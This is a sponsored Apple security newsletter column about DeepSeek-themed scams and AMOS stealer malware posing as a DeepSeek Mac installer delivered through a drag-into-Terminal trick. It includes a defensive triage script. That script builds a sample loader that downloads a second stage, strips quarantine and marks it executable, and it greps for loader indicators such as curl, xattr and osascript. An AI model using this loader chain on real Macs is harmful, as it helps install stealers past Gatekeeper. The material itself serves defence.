Presenting DMN Security Bite, proudly sponsored by Mosyle, the only Unified Platform for Apple. Our sole focus is to ensure your Apple devices are ready for work and secure. We uniquely combine advanced Apple-specific security measures for complete automated Hardening & Compliance, Next Generation EDR, AI-driven Zero Trust, and unparalleled Privilege Management with the leading and most innovative Apple MDM available. Trusted by over 45,000 organizations, we help make millions of Apple devices operational effortlessly and affordably. Request your EXTENDED TRIAL today and discover why Mosyle is your ultimate solution for Apple management.
Are you tired of hearing about DeepSeek? This chatbot from China has made waves in the tech world this week, taking the top spot on the App Store and stealing headlines. However, its quick rise to fame has also prompted a surge in phishing attempts, investment fraud, and macOS malware masquerading as legitimate DeepSeek apps. Here’s what you need to know.
Welcome to DMN Security Bite, your weekly source for insights on data privacy, updates on recent vulnerabilities, and emerging threats in Apple’s expansive ecosystem of over 2 billion active devices.
Cyble, a prominent cybersecurity firm, is tracking several new scams that ride on DeepSeek’s popularity. These include cryptocurrency frauds in which criminals trick victims into scanning QR codes that hand over access to their crypto wallets, as well as counterfeit investment schemes. I’ve also noticed numerous deceptive “DeepSeek” installers for Mac with credible-looking file names, but there’s a catch: DeepSeek hasn’t released a Mac application.
Alongside these phishing and counterfeit investment efforts, cybercriminals are peddling AMOS (Atomic), a prominent type of stealer malware on macOS, disguised as a DeepSeek Mac application. AMOS is distinct because it’s developed using Apple’s Swift language and is compatible with both Intel and Apple Silicon CPUs. This, paired with its ingenious distribution method, makes AMOS exceptionally effective. Malware creators have turned it into a subscription model, costing $1,000 monthly.
Fortunately, experts have conducted thorough dynamic and code analysis to unveil its workings. Upon infection, the malware runs scripts that connect the victim’s Mac to a command-and-control (C2) server, giving the attacker bi-directional communication with the machine. That channel lets attackers issue commands and, more critically, pull back stolen data, which typically includes Keychain passwords, saved credit card details, sensitive documents, and crypto wallet data stored in browsers and browser extensions.
With macOS Sequoia, Apple took steps to stop average users from running malware on their machines. Users on Sequoia can no longer Control-click an unsigned or unnotarized app and choose Open to bypass Gatekeeper; the override now lives in System Settings under Privacy & Security, where the user must explicitly click Open Anyway. However, as reported last year, attackers have worked around this by walking victims through pasting or running commands directly in the Terminal app, which sidesteps the Gatekeeper prompt entirely.
This same method is being utilized with the bogus DeepSeek applications.
Here’s how the scheme operates:
- The victim downloads the harmful DMG file from a website, email, or other sources.
- The attacker instructs the victim to open Terminal and drag the “.file” inside the disk image into the Terminal window instead of right-clicking it to install.
- The seemingly benign “DeepSeek.file” is actually a Bash script. Dragging it into Terminal pastes its path onto the command line; the moment the victim presses Return, the shell runs it and the infection chain begins.
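The steps above describe the lure; what a practitioner wants on the defensive side is a quick way to triage a file pulled out of a suspicious DMG without running it. The following POSIX shell script is an added example written for this article, not code from the original post, from Cyble, or from the malware itself. It checks whether a file with a non-script name (such as “DeepSeek.file”) is really a shebang script and counts lines that match generic loader behaviour (second-stage download, base64 decoding, quarantine stripping, AppleScript prompts, self-launching from /tmp). The sample file it inspects is constructed inline and harmless; the indicator list is an assumed starting point, not an AMOS signature.

```shell
#!/bin/sh
# Added example: static triage of a file dropped out of a suspicious DMG.
# Nothing here executes the inspected file; it only reads it.

# True (exit 0) when the file begins with a "#!" shebang, i.e. it is meant
# to be handed to an interpreter such as /bin/bash.
is_script() {
    [ "$(head -c 2 "$1" 2>/dev/null)" = "#!" ]
}

# Number of lines matching common loader/stealer behaviour. Assumed indicator
# list, chosen for illustration; tune it for your own environment.
suspicious_lines() {
    grep -c -E 'curl|wget|base64 -[dD]|xattr -[dc]|osascript|chmod \+x|/tmp/' "$1"
}

# Prints one of: not-a-script, script-clean, script-suspicious, script-disguised.
# "script-disguised" means a shebang script with indicator hits whose name does
# not admit that it is a script (no .sh / .command suffix), the pattern in the lure.
triage() {
    f="$1"
    case "$f" in
        *.sh|*.command) named_as_script=1 ;;
        *)              named_as_script=0 ;;
    esac
    if is_script "$f"; then
        # grep -c exits 1 on zero matches but still prints "0"; keep going.
        hits=$(suspicious_lines "$f" || true)
        if [ "$named_as_script" -eq 0 ] && [ "$hits" -gt 0 ]; then
            echo "script-disguised"
        elif [ "$hits" -gt 0 ]; then
            echo "script-suspicious"
        else
            echo "script-clean"
        fi
    else
        echo "not-a-script"
    fi
}

# --- constructed sample files standing in for a mounted DMG's contents ---
# The script mirrors the shape of the lure but is never executed here and
# points at a reserved .invalid domain.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/DeepSeek.file" <<'EOF'
#!/bin/bash
# constructed stand-in for the malicious script; these lines are never run
curl -s https://example.invalid/stage2 -o /tmp/.stage2
xattr -d com.apple.quarantine /tmp/.stage2
chmod +x /tmp/.stage2
EOF
printf 'Just a text note.\n' > "$SAMPLE_DIR/README.txt"

# Usage: triage each file that the DMG invites the user to drag into Terminal.
triage "$SAMPLE_DIR/DeepSeek.file"   # script-disguised
triage "$SAMPLE_DIR/README.txt"      # not-a-script
```

The check is deliberately static: a shebang script is fed to Apple’s own signed interpreter, so the Gatekeeper dialog the victim would have seen for an app bundle never appears, and reading the file is the only safe way to learn what it does before it runs.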
DeepSeek currently offers apps only for iOS and Android. Any installer that asks you to drag a file into Terminal, or to paste a command there, should be treated as malicious.
Moreover, as a precautionary measure, it’s advisable to steer clear of DeepSeek altogether. As a Chinese-based LLM chatbot, it is subject to local laws that involve stringent censorship and total access to user data. Engaging with DeepSeek poses significant risks to your privacy and may potentially facilitate cyber-espionage efforts against you.
I would love to hear your opinions. Do you have concerns regarding DeepSeek’s implications for privacy?
More Insights on Apple Security
- Concerns regarding DeepSeek’s privacy have triggered investigations in the US and Europe, leading to its removal from the App Store in Italy. Other countries may follow suit.
- Security researchers have identified two vulnerabilities affecting all current iPhones, iPads, and Macs, as well as many earlier models. The weaknesses, known as SLAP and FLOP, could let an attacker’s web page read data belonging to other open browser tabs.
- A judge has restricted the FBI’s powers to sift through data obtained from tech companies such as Apple, Google, and ISPs under the Foreign Intelligence Surveillance Act (FISA).
- Learn how hackers continue to exploit Google Ads to distribute malware. In 2025, how can Google, equipped with DeepMind and ample resources, still permit this?
Thank you for taking the time to read!
Follow Arin: LinkedIn, Threads, BlueSky, X.